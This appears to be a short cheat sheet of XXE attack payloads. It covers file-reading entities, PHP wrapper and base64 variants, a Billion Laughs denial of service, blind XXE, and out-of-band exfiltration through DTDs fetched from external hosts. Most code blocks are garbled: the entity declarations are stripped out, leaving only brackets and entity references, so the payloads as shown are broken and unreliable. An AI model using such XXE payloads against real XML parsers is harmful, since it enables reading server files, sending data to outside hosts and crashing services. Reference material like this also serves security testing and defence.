# XML External Entity
An XML External Entity attack is a type of attack against an application that parses XML input
## Exploit
Basic Test
```
]>
John
&example;
```
Classic XXE
```
]>
&file;
```
Classic XXE Base64 encoded
```
%init; ]>
```
PHP Wrapper inside XXE
```
]>
Jean &xxe; Dupont
00 11 22 33 44
42 rue du CTF
75000
Paris
```
Deny Of Service - Billion Laugh Attack
```
]>
&a4;
```
Blind XXE
```
]
>
&callhome;
```
XXE OOB Attack (Yunusov, 2013)
```
&send;
File stored on http://publicServer.com/parameterEntity_oob.dtd
">
%all;
```
XXE OOB with DTD and PHP filter
```
%sp;
%param1;
]>
&exfil;
File stored on http://92.222.81.2/dtd.xml
">
```
XXE Inside SOAP
```
%dtd;]>]]>
```
## Thanks to
* https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
* http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html
* https://gist.github.com/staaldraad/01415b990939494879b4